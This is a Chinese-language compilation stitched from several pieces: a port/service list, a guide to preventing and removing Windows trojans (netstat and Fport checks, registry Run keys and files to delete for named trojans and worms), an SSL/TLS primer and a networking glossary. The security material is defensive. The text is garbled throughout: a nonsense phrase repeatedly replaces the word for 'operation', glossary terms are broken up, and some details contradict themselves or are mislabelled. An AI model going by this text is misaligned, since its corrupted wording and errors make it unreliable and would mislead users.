562=chcmd
563=Unassigned
564=plan9fileservice
565=whoami
566-569Unassigned
570=demonmeter
571=udemonmeter
572-599Unassignedipcserver
600=SunIPCserver
607=nqs
606=CrayUnifiedResourceManager
608=Sender-Initiated/UnsolicitedFileTransfer
609=npmp-trapnpmp-trap
610=npmp-localnpmp-local
611=npmp-guinpmp-gui
634=ginadginad
666=DoomIdSoftware
704=errlogcopy/serverdaemon
709=EntrustManager
729=IBMNetViewDM/6000Server/Client
730=IBMNetViewDM/6000send/tcp
731=IBMNetViewDM/6000receive/tcp
741=netGWnetgw
742=NetworkbasedRev.Cont.Sys.
744=FlexibleLicenseManager
747=FujitsuDeviceControl
748=RussellInfoSciCalendarManager
749=kerberosadministration
751=pump
752=qrh
754=send
758=nlogin
759=con
760=ns
762=quotad
763=cycleserv
765=webster
767=phonephonebook
769=vid
771=rtip
772=cycleserv2
774=acmaint_dbd
775=acmaint_transd
780=wpgs
786=Concertconcert
800=mdbs_daemon
996=CentralPointSoftware
997=maitrd
999=puprouter

木马防范及一些端口的关闭

一、防范木马应该注意的一些问题
　　1、不到不受信任的网站上下载软件运行
　　2、不随便点击来历不明邮件所带的附件
　　3、及时安装相应的系统补丁程序
　　4、为系统选用合适的正版杀毒软件，并及时升级相关的病毒库
　　5、为系统所有的用户设置合理的用户口令

　　口令设置要求：
　　1.口令应该不少于8个字符；
　　2.不包含字典里的单词、不包括姓氏的汉语拼音；
　　3.同时包含多种类型的字符，比如　　
　　o大写字母(A,B,C,..Z)
　　o小写字母(a,b,c..z)
　　o数字(0,1,2,…9)
　　o标点符号(@,#,!,$,%,& …)

　　win2000口令设置方法:

　　当前用户口令：在桌面环境下按crtl+alt+del键后弹出选项单，选择其中的更改密码项后按要求输入你的密码（注意：如果以前administrator没有设置密码的话，旧密码那项就不用输入，只需直接输入新的密码）。

　　其他用户口令：
　　在开始->控制面板->用户和密码->选定一个用户名->点击设置密码

　　二、检查和清除木马可能会使用到命令

　　1、如何进入命令行方式？

　　win98下在开始-->运行中输入command点确定
　　winnt、win2000、winxp下在开始-->运行中输入cmd后点确定

　　2、如何使用netstat命令？

　　netstat是用来显示网络连接、路由表和网络接口信息的命令，使用方法是在命令行下输入netstat -an后回车，输出结果格式如下：
　　Active Connections
　　Proto Local Address Foreign Address State
　　TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
　　TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
　　TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
　　TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING
　　UDP 0.0.0.0:445 *:*
　　UDP 0.0.0.0:2967 *:*
　　UDP 0.0.0.0:38037 *:*
　　这其中Proto项代表是协议类型，Local Address项代表的是本地IP地址和端口（冒号后面为端口号），Foreign Address项代表的是外部IP地址和端口,State表示的是当前状态。上面这个结果表示这台机器开放了TCP的135、445、1025和1026 端口，UDP的445、2967和38027端口

　　3、如何使用Fport命令？

　　Fport是查看系统进程与端口关联的命令，使用方法是在命令行方式下输入Fport后回车，输出结果格式如下：

　　Pid Process Port Proto Path
　　472 svchost -> 135 TCP C:\WINNT\system32\svchost.exe
　　8 System -> 445 TCP
　　580 MSTask -> 1025 TCP C:\WINNT\system32\MSTask.exe
　　8 System -> 1026 TCP
　　8 System -> 445 UDP
　　444 rtvscan -> 2967 UDP C:\Program Files\NavNT\rtvscan.exe
　　812 MsgSys -> 38037 UDP C:\WINNT\System32\MsgSys.EXE

　　这其中port下面代表的是系统当前开放的端口而path下面列出的是与该端口关联的程序及其所在位置。
　　从上面这个结果看，系统上135、445端口是与C:\winnt\system32\svchost.exe程序关联的1025、1026、445 （udp)端口与　　　　　　　　c:\winnt\system32\mstask.exe程序关联的2967(udp)端口是与C:\Program Files\NavNT\rtvscan.exe程序关联的38027(udp)端口是与　　C:\WINNT\System32\MsgSys.EXE 程序关联的

　　注：fport仅适用于winnt、win2000和winxp，在win98下无法使用

　　 4、如何编辑注册表？

　　请在开始--〉运行中输入regedit后点确定进入注册表编辑状态。注册表编辑框左边显示的是注册表的项，右边显示的是注册的键值，要删除键值请点中该键值后点右键选择其中的删除。要修改键值请点中该键值后点鼠标右键选择修改。要删除项请选中该项后点右键选删除。

　　5、如何关闭服务？

　　开始-->控制面版-->管理工具-->服务进入服务管理工具，选中要关闭的服务后点右键选停止
　　注：上面方法仅适用于WINNT、WIN2000和WINXP

　　6、如何进入安全模式？

　　系统启动时按F8

　　7、如何杀进程？

　　win98下按ALT+CTRL+DEL，在弹出的对话框中选中你要结束的进程后点关闭，winnt、win2000和winxp下按ALT+CTRL+DEL弹出窗口后选择任务管理器，在进程一项里选中你要结束的进程后点击结束进程

　　三、常见木马及控制软件的服务端口与关闭方法

　　注意：下文中提到的相关路径根据您的想跳楼作系统版本不同会有所不同，请根据自己的系统做相应的调整
　　win98系统： c:\windows c:\windows\system
　　winnt和win2000系统： c:\winnt c:\winnt\system32
　　winxp系统： c:\windows c:\windows\system32
根据系统安装的路径不同，目录所在盘符也可能不同，如系统安装在D盘，请将C:\windows改为D:\windows依此类推大部分的木马程序都可以改变默认的服务端口，我们应该根据具体的情况采取相应的措施，一个完整的检查和删除过程如下例所示：

　　例：113端口木马的清除（仅适用于windows系统）：
　　这是一个基于irc聊天室控制的木马程序。

　　1.首先使用netstat -an命令确定自己的系统上是否开放了113端口

　　2.使用fport命令察看出是哪个程序在监听113端口
　　例如我们用fport看到如下结果：
　　Pid Process Port Proto Path
　　392 svchost -> 113 TCP C:\WINNT\system32\vhos.exe

　　我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为
　　c:\winnt\system32下。

　　3.确定了木马程序名（就是监听113端口的程序）后，在任务管理器中查找到该进程，并使用管理器结束该进程。

　　4.在开始-运行中键入regedit运行注册表管理程序，在注册表里查找刚才找到那个程序，并将相关的键值全部删掉。

　　5.到木马程序所在的目录下删除该木马程序。（通常木马还会包括其他一些程序，如，rscan.exe、psexec.exe、 ipcpass.dic、ipcscan.txt等，根据木马程序不同，文件也有所不同，你可以通过察看程序的生成和修改的时间来确定与监听113端口的木马程序有关的其他程序）

　　6.重新启动机器。

　　以下列出的端口仅为相关木马程序默认情况下开放的端口，请根据具体情况采取相应的想跳楼作：

　　707端口的关闭：
　　这个端口开放表示你可能感染了nachi蠕虫病毒，该蠕虫的清除方法如下：
　　停止服务名为WINS Client和Network Connections Sharing的两项服务
　　删除c:\winnt\SYSTEM32\WINS\目录下的DLLHOST.EXE和SVCHOST.EXE文件
　　编辑注册表，删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services项中名为RpcTftpd和RpcPatch的两个键值

　　1999端口的关闭：
　　这个端口是木马程序BackDoor的默认服务端口，该木马清除方法如下：
　　使用进程管理工具将notpa.exe进程结束
　　删除c:\windows\目录下的notpa.exe程序
　　编辑注册表，删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项中包含c:\windows
otpa.exe /o=yes的键值

　　2001端口的关闭：
　　这个端口是木马程序黑洞2001的默认服务端口，该木马清除方法如下：
　　首先使用进程管理软件将进程windows.exe杀掉
　　删除c:\winnt\system32目录下的windows.exe和S_Server.exe文件
　　编辑注册表，删除将HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\项中名为windows的键值
　　将HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINE\Software\CLASSES项中的Winvxd项删除
　　修改HKEY_CLASSES_ROOT\txtfile\shell\open\command项中的c:\winnt\system32\S_SERVER.EXE %1为C:\WINNT\NOTEPAD.EXE %1
　　修改HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command项中的c:\ winnt\system32\S_SERVER.EXE %1键值改为C:\WINNT\NOTEPAD.EXE %1

　　2023端口的关闭：
　　这个端口是木马程序Ripper的默认服务端口，该木马清除方法如下：
　　使用进程管理工具结束sysrunt.exe进程
　　删除c:\windows目录下的sysrunt.exe程序文件
　　编辑system.ini文件，将shell=explorer.exe sysrunt.exe 改为shell=explorer.exe后保存
　　重新启动系统

　　2583端口的关闭：
　　这个端口是木马程序Wincrash v2的默认服务端口，该木马清除方法如下：
　　编辑注册表，删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\项中的WinManager = 　"c:\windows\server.exe"键值
　　编辑win.ini文件，将run=c:\windows\server.exe改为run=后保存退出
　　重新启动系统后删除C:\windows\system\ SERVER.EXE

　　3389端口的关闭：
　　首先说明3389端口是windows的远程管理终端所开的端口，它并不是一个木马程序，请先确定该服务是否是你自己开放的。如果不是必须的，请关闭该服务。

　　win2000关闭的方法：win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项，
　　选中属性选项将启动类型改成手动，并停止该服务。
　　win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项，选中属性选项将启动类型改成手动，并停止该服务。
　　winxp关闭的方法：在我的电脑上点右键选属性-->远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。

　　4444端口的关闭：
　　如果发现你的机器开放这个端口，可能表示你感染了m**last蠕虫，清除该蠕虫的方法如下：
　　使用进程管理工具结束m**last.exe的进程
　　编辑注册表，删除HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run项中的"windows auto update"="m**last.exe"键值
　　删除c:\winnt\system32目录下的m**last.exe文件


　　4899端口的关闭：
　　首先说明4899端口是一个远程控制软件（remote administrator)服务端监听的端口，他不能算是一个木马程序，但是具有远程控制功能，通常杀毒软件是无法查出它来的，请先确定该服 务是否是你自己开放并且是必需的。如果不是请关闭它。

　　关闭4899端口：
　　请在开始-->运行中输入cmd(98以下为command),然后cd C:\winnt\system32(你的系统安装目录），输入r_server.exe /stop后按回车。然后在输入r_server /uninstall /silence 到C:\winnt\system32(系统目录）下删除r_server.exe admdll.dll raddrv.dll三个文件


　　5800，5900端口：
　　首先说明5800，5900端口是远程控制软件VNC的默认服务端口，但是VNC在修改过后会被用在某些蠕虫中。
　　请先确认VNC是否是你自己开放并且是必须的，如果不是请关闭

　　关闭的方法：
　　首先使用fport命令确定出监听在5800和5900端口的程序所在位置（通常会是c:\winnt\fonts\explorer.exe)
　　在任务管理器中杀掉相关的进程（注意有一个是系统本身正常的，请注意！如果错杀可以重新运行c:\winnt\explorer.exe)
　　删除C:\winnt\fonts\中的explorer.exe程序。
　　删除注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run项中的Explorer键值。
　　重新启动机器。

SSL.TLS.WTLS原理（上）

一 前言

首先要澄清一下名字的混淆：
1 SSL(Secure Socket Layer)是netscape公司设计的主要用于web的安全传输协议

。这种协议在WEB上获得了广泛的应用。
2 IETF(www.ietf.org)将SSL作了标准化，即RFC2246,并将其称为TLS（Transport

Layer Security），从技术上讲，TLS1.0与SSL3.0的差别非常微小。由于本文中

没有涉及两者间的细小差别，本文中这两个名字等价。
3 在WAP的环境下，由于手机及手持设备的处理和存储能力有限，wap论坛（

www.wapforum.org）在TLS的基础上做了简化，提出了WTLS协议（Wireless

Transport Layer Security），以适应无线的特殊环境。

我们从各式各样的文章中得知，SSL可以用于保密的传输，这样我们与web server

之间传输的消息便是“安全的”。
而这种“安全”究竟是怎么实现的，最终有能实现多大程度的保密？本文希望能

用通俗的语言阐明其实现原理。


二 整体结构概览

SSL是一个介于HTTP协议与TCP之间的一个可选层，其位置大致如下：

－－－－－－－－－
| HTTP |
－－－－－－－－－
| SSL |
－－－－－－－－－
| TCP |
－－－－－－－－－
| IP |
－－－－－－－－－

如果利用SSL协议来访问网页，其步骤如下：
用户：在浏览器的地址栏里输入https://www.sslserver.com
HTTP层：将用户需求翻译成HTTP请求，如
GET /index.htm HTTP/1.1
Host http://www.sslserver.com

SSL层: 借助下层协议的的信道安全的协商出一份加密密钥，并用此密钥来加密

HTTP请求。
TCP层：与web server的443端口建立连接，传递SSL处理后的数据。

接收端与此过程相反。

SSL在TCP之上建立了一个加密通道，通过这一层的数据经过了加密，因此达到保

密的效果。

SSL协议分为两部分：Handshake Protocol和Record Protocol,。其中Handshake

Protocol用来协商密钥，协议的大部分内容就是通信双方如何利用它来安全的协

商出一份密钥。 Record Protocol则定义了传输的格式。






三 需要的加密方面的基础知识
了解SSL原理需要一点点加密的概念，这里把需要的概念做一下简单阐述：

加密一般分为三类，对称加密，非对称加密及单向散列函数。

对称加密：又分分组密码和序列密码。
分组密码是将明文按一定的位长分组，明文组经过加密运算得到密文组，密文组

经过解密运算
（加密运算的逆运算），还原成明文组。
序列密码是指利用少量的密钥（制乱元素）通过某种复杂的运算（密码算法）产

生大量的伪随机位流，用于对明文位流的加密。
解密是指用同样的密钥和密码算法及与加密相同的伪随机位流，用以还原明文位

流。

CBC(Cipher Block Chaining)模式这个词在分组密码中经常会用到，它是指一个

明文分组在被加密之前要与前一个的密文分组进行异或运算。当加密算法用于此

模式的时候除密钥外，还需协商一个初始化向量（IV），这个IV没有实际意义，

只是在第一次计算的时候需要用到而已。采用这种模式的话安全性会有所提高。

分组密码的典型例子为DES,RC5,IDEA。
序列密码的典型例子为RC4。

公钥加密：
简单的说就是加密密钥与解密密钥不同，分私钥和公钥。这种方法大多用于密钥

交换，RSA便是一个我们熟知的例子。
还有一个常用的称作DH，它只能用于密钥交换，不能用来加密。

单向散列函数：
由于信道本身的干扰和人为的破坏，接受到的信息可能与原来发出的信息不同，

一个通用的办法就是加入校验码。
单向散列函数便可用于此用途，一个典型的例子是我们熟知的MD5,它产生128位的

摘要，在现实中用的更多的是安全散列算法（SHA），SHA的早期版本存在问题，

目前用的实际是SHA－1，它可以产生160位的摘要，因此比128位散列更能有效抵

抗穷举攻击。

由于单向散列的算法都是公开的，所以其它人可以先改动原文，再生成另外一份

摘要。解决这个问题的办法可以通过HMAC（RFC 2104）,它包含了一个密钥，只有

拥有相同密钥的人才能鉴别这个散列。

org术语表1
? 1 0 0 B a s e - V G或者1 0 0 V G - A n y L A N—使用需求优先权传输数据包的一种速率为
1 0 0 M b p s的通信技术。
? 1 0 0 B a s e - X—1 0 0 M b p s的快速以太网标准，使用C S M A / C D访问方法进行通信，具体说
明见标准IEEE 802.3u。
A
? access server (访问服务器)—访问服务器是将同步设备和异步设备连接到网络、并为
同步通信和异步通信提供路由技术的一个单元。
? active hub (有源电缆接头)—有源电缆接头是在星形拓扑结构中连接结点的一种网络
传输设备，每当数据信号通过集线器时，可以对其进行重建、重定时和放大。
? Address Resolution Protocol (地址解析协议, ARP)—一种基于T C P / I P的协议，利用该
协议，发送结点可以确定接收结点的M A C地址。
? American National Standards Institute (美国国家标准协会, ANSI)—这是致力于为各种
产品(包括网络设备)建立标准的组织。
? American Standard Code for Information Interchange ( 美国信息交换标准码, ASCII)—
一种8位字符编码的方法，由9 6个大写字母、小写字母和数字另加3 2个非打印字符组成。
? analog (模拟)—模拟是一种可以连续变化的各种类型的传输，如正电压和负电压的电
波。
? A p p l e Ta l k—对等协议，用于网络上多台M a c i n t o s h计算机之间的通信。
? application-specific integrated circuit (专用集成电路, ASIC)—在芯片上定制的集成电
路，其中包括特殊的逻辑功能，如快速路由逻辑。
? Asynchronous Transfer Mode (异步传输模式, AT M )—采用信元、多通道和交换在同一
网络上发送音频、视频和数据传输的传输方法。
? ATM attached device (AT M附属设备)—将数据流转换为AT M信元流，或者将AT M信元
流转换成数据流的设备。
? ATM Forum (AT M论坛)—与ITU T一起，致力于AT M的L A N和WA N应用规范制定的
硬件供应商、电信服务提供商以及用户的联盟。
? ATM permanent virtual circuit (AT M永久虚拟电路, PVC)—一个专用电路，在两个指
定端点之间具有预先配置的路径一个固定分配的带宽。
? ATM switch (AT M交换器) — 一个交换器，以AT M分层通信的方式对信元传输进行想跳楼
作。
? ATM switched virtual circuit (AT M转换虚拟电路, SVC)—为分立的通信任务建立并使
用的电路，当该任务完成时，则拆卸该电路。
? attachment unit interface (连接单元接口, AUI)—是一种网络接口，用来将同轴电缆、
双绞线或光纤主干电缆连接到网络结点如集线器、交换机或工作站上。接口由连接器、
电缆、接口回路和电气特性的A U I标准组成。
? attenuation (衰减)—当信号沿通信介质从源(传输结点)发送到接收结点时，丢失的信
号量。
? Audio Video Interleave (音频视频交错, AV I )—AV I是一种声频和视频文件格式，为
Microsoft Windows 3.1或更高环境下的应用而开发。AV I对那些准备复制为短小的“片”
的视频和音频数据进行隔行扫描。






B
? backbone (主干)—一种高容量的通信介质，用于连接同一层、不同层或跨越长距离的
网络。
? backbone cabling (主干布线)—根据E I A / T I A - 5 6 8标准的定义，主干电缆为在网络设备
室、楼层和建筑物用的电缆。
? band rate (波特率)—波特率衡量数据传输速率，用来描述老式调制解调器的速度，在
一次信号振荡时发出一个数据位。
? bandwidth (带宽)—带宽指通信介质的传输能力，通常以每秒多少位(数据传输)或赫兹
(对于数据、音频和视频传输)来衡量，并由最大传输能力减去最小传输能力决定。
? baseband (基带)—基带是一种传输类型。在基带传输中，通信介质(如电缆)的整个通
道容量只被一个数据信号使用，从而在一定时间只有一个结点用于传输。
? Basic Rate Interface for ISDN (ISDN基本速率接口, BRI)—一种I S D N接口，由三个信
道组成。其中两个6 4 K b p s的信道用于传输数据、语音、视频和图形。第三个1 6 K b p s信
道用于传输信令。
? batch (批处理)—不需要用户或其他计算机系统干预的一个接一个的一系列处理过程。
处理大量数据或一系列复杂功能的计算机的维护工作通常采用这种方式，而且这种工作
通常是在夜间进行的。
? bayonet nut connector (同轴电缆接插件, BNC)—用于细同轴电缆，有一个卡销一样的
套。Male BNC有两个旋钮，插在female BNC的环形槽中。连接时，两个接插件要绞在
一起。
? beaconing (信标)—信标是令牌环网中的错误状态，表明有一个或一个以上的结点出现
想跳楼作异常。
? bidirectional interpolation (双向插补)—双向插补是一种视频压缩技术，在序列中影象
的前后影象里都存在与当前影象相同的部分，可以通过创建指向这部分的指针来压缩
帧。
? bits per second (比特/秒, bps)—比特/秒是每秒发送的二进制位( 0或1 )的个数。
? bridge (网桥)—网桥是将使用相同的访问手段的不同局域网段连接在一起的网络传输
设备。例如，使用网桥将一个以太局域网连接到另一个以太局域网，或将令牌环局域网
连接到另一个令牌环局域网上。
? bridge protocol data unit (网桥协议数据单元, BPDU)—B P D U是网桥所用的专门的帧，
用来彼此间交换信息。
术语表计计295
? broadband (宽带)—这种传输中，通信介质上有多个传输通道，允许在同一时刻有多
个结点进行传输。
? broadband ISDN (宽带ISDN, B-ISDN)—当前正处于开发之中，该技术可以提供
1 5 5 M b p s或者更高的数据传送速率。
? broadcast storm (广播扰动)—当大量的计算机或设备要同时传输时，或者当计算机或
设备都要进行重复传输，网络流量超负荷就会引起网络带宽饱和，称之为广播扰动。
? brouter (桥式路由器)—桥式路由器是充当网桥或路由器的一种网络设备，具体是充当
网桥还是路由器，则要根据它转发给定协议的方法而定。
? buffering (缓存)—缓存是一种设备，例如交换机，在存储器中临时存储信息的能力。
? bus (总线)—总线是计算机中用来传输数据的一条路径，例如，在C P U和连接在计算
机上的外设之间的通道。
? bus topology (总线结构)—总线结构是从一台P C或文件服务器连接到另一台的网络设
计，就像链上的链接那样。





C
? cable plant (电缆线路)—用来构成网络的所有的通信电缆的数量。
? cableco—有线电视公司，如T C I。
? carrier sense (载波侦听)—载波侦听是检验通信介质如电缆等以确定电压级别、信号转
换等的过程，通过载波侦听可以说明网络上是否出现了载有数据的信号。
? Carrier Sense Multiple Access with Collision Detection (带有冲突检测的载波侦听多路存
取, CSMA/CD)—C S M A / C D是以太网中使用的一种网络传输控制方法。它通过检查包
冲突来调整传输。
? cell (信元)—是用于高速传输的格式化数据单元，经常用在AT M中。
? cell switching (信元交换) — 一种使用T D M和虚拟通道的转换方式，在每一个T D M时
间片的开头都放置一个简短的指示器或虚拟通道标识符。
? Challenge Handshake Authentication Protocol 难题握手鉴定协议( C H A P )— 用于对口令
加密的协议，例如在一个WA N上传输的服务器帐户口令。
? channel bank (信道组)—信道组是在一个集中的位置组合了通信信道(如T- 1 )的大规模
多路转接器。
? channel service unit (通道服务器, CSU)—这种设备是在网络设备(如路由器)和T载波线
路之间的一个物理接口。
? circuit switching (电路交换)—电路交换技术是一种网络通信技术，采用专用的信道在
两个结点间传输信息。
? Classical IP over ATM (AT M上的经典IP) — AT M上I P的传输，一个严格集中于I P支持
的技术。
? Classless Interdomain Routing (无类别域间路由, CIDR)—一种新的I P编址方法，该方
法忽略了地址的类别设计，在点分十进制地址的后面使用一条斜线，用以指明可用地址
的总数目。
? coaxial cable (同轴电缆)—同轴电缆是一种网络电缆介质，由被绝缘层包围的铜芯组
成。绝缘层又被另外的传导材料如编织导线包围，传导材料又由外层的绝缘材料覆盖。
? collision (冲突)—冲突是在以太网上同时检测到两个或多个包时的状态。
? community name (公用名)—网络代理和网络管理工作站使用的一个口令，其作用是不
让它们的通信被未经授权的工作站或者设备轻易截取。
? community name (公共管理接口协议, CMIP)—该协议是O S I网络管理标准的一部分，
用以收集网络性能数据。
? Compressed Serial Line Internet Protocol (压缩串行线路互连网协议, CSLIP)— S L I P远
程通信协议的扩展，能够提供比S L I P更快的吞吐量。
? computer network (计算机网络)—计算机网络是由通信电缆或无线电波链接的计算机、
打印机设备、网络设备和计算机软件系统。
? concentrator (集中器)—集中器是可以让多个输入和输出同时活动的设备。
? connection-oriented service (面向连接的服务)—这是在L L C子层和网络层间进行的
Type 2想跳楼作，提供了多种途径来保证接收结点成功地接收到了数据。
? connectionless service (无连接服务)—无连接服务也就是常说的Type 1想跳楼作，是L L C子
层和网络层间的服务，但是这里不能检测数据是否已经确实到达了接收结点。
? current-state encoding (当前状态编码)—这是一种数字信号编码方法，这里，对某信号
状态分配一个二进制值，例如+ 5 v电压为二进制值1，0 v为二进制值0。
? cut-through switching (开通式交换)—通过开通式交换这种交换技术在整个帧到达之前
来转发帧的一部分。
? cyclic redundancy check (循环码校验, CDC)—C D C为一种错误校验方法，这种方法中
要计算包含在帧中的整个信息域的大小，计算出来的值由发送结点的数据链接层插入到
靠近帧尾的位置，并又接收结点的数据链接层进行校验，以确定是否出现了传输错误

术语表（2）


D
? data circuit equipment (数据电路设备, DCE)—在X . 2 5网络上，D C E指的是一个分组交
换机或者P D N访问设备。
? data link connection identifier (数据链路连接标识, DLCI)—在帧中继网络上用以标识
单个的虚拟连接。
? Data Link Control (数据链路控制, DLC)—设计用于与一个I B M大型机或微型机通信的
协议，它使用S N A通信。
? data service unit (数据服务器, DSU)—与C S U共同使用的一种设备，用于T载波线路上
的通信。D S U为接收网络而转换在线路上传输和接收的数据。
? data terminal equipment (数据终端设备, DTE)—在X . 2 5网络上，D T E是指运行在分组
交换网络上的终端、工作站、服务器和主计算机等。不管实际使用的设备到底是什么，
有时都将D T E设备称为终端。
? data warehouse (数据仓库)—一种数据库访问技术，这种技术将一个主机数据库(例如，
大型机上的数据库)复制到另外一个数据库服务器上，目的是为了能够在不中断主机数
据库的情况下创建报表或者浏览数据，一般情况下可以允许使用点击型报表编写工具。
? datagram (数据报)—X . 2 5的一种传输模式，在这种模式下，没有使用特殊的通信信道，
常常导致数据不能以它们发送时的顺序到达，因为每一个数据报可能会沿不同的路径到
达目的地。
? demand priority (需求优先权)—一种数据通信技术，这种技术可以直接将信息包传送
给目标结点，在传输过程中只经过一个集线器，无需经过其他的网络结点。
? dense wavelength division multiplexing (密集波分多路复用, DWDM)—一种新出现的多
路复用技术，该技术使用单模光纤，可以在一条光缆上建立多个路径同时进行数据传输。
? digital (数字式)—这是一种传输方法，其中不同的信号级都用二进制表示，如二进制0
和1分别代表0 v和+ 5 v。
? digital subscriber line (数字用户线路, DSL)—一种使用高级调制技术的技术，该技术
可以在用户和电话公司之间通过已有的电信网络形成高速的网络连接，其通信速度可以
高达6 0 M b p s。
? discovery (发现)—发现是路由器采用的一个过程，包括采集诸如网络上有多少个结点
以及结点的位置等信息。
? Distance Vector Multicast Routing Protocol (距离向量广播路由协议, DVMRP)—
D V M R P是一种与R I P共同工作的多点广播(也称多点传送)协议，可确定哪个工作站被预
定给了多点传送。
? Domain Name Service (域名服务, DNS)—一种T C P / I P应用协议，该协议可以将计算机
的域名转换为I P地址，或者将I P地址转换为域名。
? dotted decimal notation (点分十进制表示法)—一种编址技术，该技术将四个8位字节，
例如1 0 0 0 0 11 0 . 11 0 111 1 0 . 11 0 0 1 0 11 . 0 0 0 0 0 1 0 1 ，转换成十进制表示( 例如，
1 3 4 . 2 2 2 . 1 0 1 . 0 0 5 )，用以标识网络和网络上的单个主机。
? d r i v e r (驱动程序)—驱动程序是一种软件，可使计算机与N I C、打印机、显示器和硬盘
驱动器进行通信。每一个驱动程序都有其特定的目的，例如，处理以太网通信。
? dynamic addressing (动态编址)—一种编址方法，在这种方法中，无需网络管理员将I P
地址“硬编码”在设备的网络配置中便可以实现I P地址的分配。
? Dynamic Host Configuration Protocol (动态主机配置协议, DHCP)—一种网络协议，通
过D H C P，服务器可以自动地将一个I P地址分配给其网络上的某个设备。
? dynamic routing (动态路由)—在动态路由这种路由进程中，路由器不停地检查网络的
配置，自动更新路由表，并自己来决定如何路由包。





E
? electromagnetic interference (电磁干扰, EMI)—电磁干扰是马达等电力设备引起的磁力
场产生的信号干扰。
? electronic data interchange (电子数据交换, EDI)—使用电子方法在计算机或电话网络
上传输商业、组织和个人数据。
? Electronic Industries Alliance (电子工业联合会, EIA)—这是发展网络布线标准和电子
接口标准的标准化组织。
? encapsulation (封装)—封装是在网络间转换帧的过程。在这一进程中，要将一种类型
的网络的数据帧放入另一网络使用的头部，使得新的头的作用如同发信时的信封。
? enterprise network (企业网)—企业网是L A N、M A N或WA N的组合，为计算机用户提
供一系列计算机和网络资源，以完成各种工作。
? Ethernet (以太网)—以太网是使用C S M A / C D访问方法进行网络数据传输的一种传输系
统。以太网一般是通过总线或总线—星型拓扑结构实施的。
? Extended Binary Coded Decimal Interchange Code (扩充二进制编码十进制交换码,
E B C D I C )—这是一种主要用于I B M大型机的字符编码技术，对2 5 6个字母、数字和特
殊字符组成的字符集进行8位编码。
? E x t r a n e t—一种用WA N链路连接两个或者多个I n t r a n e t所形成的网络。
F
? farm (群)—放置在同一个地方的一组计算机主机(例如大型机)或服务器或两者都有，
例如放置在一个机房内。
? Fast Ethernet (快速以太网)—传输速度在1 0 0 M b p s的以太网通信，其详细说明见标准
IEEE 802.3u。
? fat pipe (粗管)—用于网络主干(如在建筑物的楼层间)以进行高速通信的光纤电缆。
? Fiber Distributed Data Interface (光纤分布式数据接口, FDDI)—F D D I是一种光纤数据
传输方法，采用的拓扑结构为双环拓扑，其传输速度可达1 0 0 M b p s。
? f i b e r-optic cable (光纤电缆)—光纤电缆是一种通信电缆，由两个或多个玻璃或塑料光
纤芯组成，这些光纤芯位于保护性的覆层内，由塑料P V C外部套管覆盖。沿内部光纤进
行的信号传输一般使用红外线。
? File Transfer Protocol (文件传输协议, FTP)—一种T C P / I P应用协议，该协议以批数据
流的方式传输文件，是一种在I n t e r n e t上广泛使用的协议。
? firewall (防火墙)—防火墙是用来保护数据免受外界访问的软件或硬件，也可以防止网
络中数据泄露到外面。
? firmware (固件)—固件是一种存储在R O M等设备的芯片上的软件。
? flow control (流控制)—流控制过程用来确保设备发送信息时的速度不高于接收设备的
接收速度。
? fractal image compression (不规则图象压缩)—不规则图象压缩是一种视频压缩技术，
利用不规则图象片、复制图象和映射的特性来压缩帧。
? frame (帧)—有时“帧”一词可以与“包”交换使用，但帧指的是网络上传输的数据单
元，其中包含与开放系统互连( O S I )的数据链接层(即第2层)相应的控制信息和地址信息。
? frame relay (帧中继)—一种通信协议，使用分组交换和虚拟电路技术进行分组传输，
该技术通过将大量的差错检验功能留给中间结点，可以获得较高的数据传输速率。
? frequency-division multiple access ( 频分多路访问技术, FDMA)—频分多重访问技术在
一种通信介质上通过给每一个信道确立不同的频率来创建不同的信道。
? full-duplex (全双工)—全双工是指可以同时发送、接收信号的能力。






G
? gateway (网关)—网关是一种网络设备，可使不同类型的网络间相互通信，如在复杂
的协议间或不同的E- m a i l系统间进行通信。
H
? half-duplex (半双工)—半双工是指可以发送接收信号、但不能同时进行的能力。
? hop (跳)—跳是帧或包从一个网络向另一个网络点对点的运动。
? horizontal cabling (水平布线)—根据E I A / T I A - 5 6 8标准的定义，水平布线为在同一工作
区域中连接工作站和服务器的布线。
? host (主机)—主机是具有想跳楼作系统的，多台计算机可同时访问其文件、数据和服务的
计算机(包括大型机、小型机、服务器或工作站)。程序和信息可在主机上进行处理，或
下载到访问计算机(客户机)上来处理。
? hub (集线器)—集线器是将各个单独的电缆段或单独的L A N连接在一起成为一个网络
的中央设备。
? hybrid fiber/coax (混合光纤/同轴, HFC)电缆—这种电缆由电缆护套组成，电缆护套中
包含着光纤和铜电缆的组合。

‘



I
? impedance (阻抗)—阻碍电流流动的总值。
? Institute of Electrical and Electronics Engineers (电气电子工程师协会, IEEE)—这是由
一群科学家、工程师、技术人员和教育家组成的组织，在开发网络布线和数据传输标准
方面起着领导作用。
? Integrated Services Digital Network (综合业务数字网, ISDN)—一种在电话线上传输数
据服务的网络标准，当前的实际速率为1 . 5 3 6 M b p s，理论上可以达到6 2 2 M b p s的传输速
率。
? Integrated Services Digital Network (综合服务数字网, ISDN)—I S D N是在电话线上用
信道的组合来传递音频、数据和视频服务的WA N技术。
? International Organization for Standardization (国际标准化组织, ISO)—I S O是一国际组
织，致力于建立通信和网络标准，其最为突出、广为人知的贡献是建立了网络协议标
准。
? International Telecommunications Union (国际通信联盟, I T U )—I T U是国际上致力于规
定远程通信标准的组织，例如，它为调制解调器和WA N通信制订了标准。
? Internet Engineering Task Force ( Internet工程任务组, IETF)—I E T F是I S O C的左膀右
臂，致力于与Internet 相关的技术问题。
? Internet Function (互连功能, IWF) — 一个标准，为在AT M上实现帧中继提供重新映射
